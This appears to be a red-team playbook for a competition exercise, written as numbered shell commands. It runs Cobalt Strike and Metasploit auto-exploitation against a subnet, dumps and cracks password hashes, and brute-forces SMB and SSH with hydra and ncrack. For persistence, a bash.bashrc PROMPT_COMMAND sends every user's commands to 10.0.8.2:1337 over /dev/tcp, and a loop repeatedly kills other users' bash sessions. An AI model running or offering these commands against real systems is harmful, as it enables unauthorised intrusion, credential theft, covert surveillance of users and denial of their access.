- Figure out what services we would like to host and get them configured
- Assign tasks
- Assign positions
- ???
- Profit
- cd in the
67-CW-Challengefolder - Setup teamserver on box using
./CobaltStrike/teamserver IP 33NWSIsTheBest ./CobaltStrike/cobalt.profile - Run cobalt strike using
./CobaltStrike/cobaltstrike
2.1. Ensure that a reverse HTTP listener exists called "listener" - Run
msfconsole setg LHOST 192.168.10.225setg RHOSTS 192.168.10.0/24resource ./Metasploit/auto-exploit.rc- In cobaltstrike script console window, type
creds - Run
mkdir scans; bash scans.sh - Run
cat creds.txt | cut -d":" -f2 | sed 's/ //g' > hashes.txt - Run
cat creds.txt | cut -d":" -f1 | sed 's/ //g' > users.txt - Upload hashes to hashkiller
- Copy results to
hashkiller.txt11.1. Runcat hashkiller.txt | grep -v "No Match" | cut -d" " -f3 | sed 's/ //g' > passwords.txt - Run
python3 user-pass.py - Run
hydra -C user-pass.txt -M ./scans/445_scan.txt smb | tee smb_results.txt
13.1. Runhydra -C user-pass.txt -M ./scans/22_scan.txt ssh | tee ssh_results.txt - Run
hydra -L users.txt -P passwords.txt -M ./scans/445_scan.txt smb | tee results.txt14.1. Runhydra -L users.txt -P passwords.txt -M ./scans/22_scan.txt ssh | tee results.txt14.2 Runncrack -iL scans/445_scan.txt --pairwise -U users.txt -P passwords.txt -p smb - Run
cat *results.txt | grep login: > valid_creds.txt
- See if there is a world baschrc
ls -al /etc/bash.bashrc
0.1. If there is,vim /etc/bash.bashrcand addexport PROMPT_COMMAND='RETRN_VAL=$?;echo "$(hostname -I)- $(whoami) [$$]: $(history 1 | sed "s/^[ ]*[0-9]\+[ ]*//" ) [$RETRN_VAL]" > /dev/tcp/10.0.8.2/1337'
0.2. On your local computer, setupncat -lk 1337 | tee log.txt
0.3. If there isn't.
0.4. while true; do test=$$; ps awux | grep bash | grep -v $test | grep -v grep | awk '{print $2 }' | xargs kill -9 ; sleep 10 ; done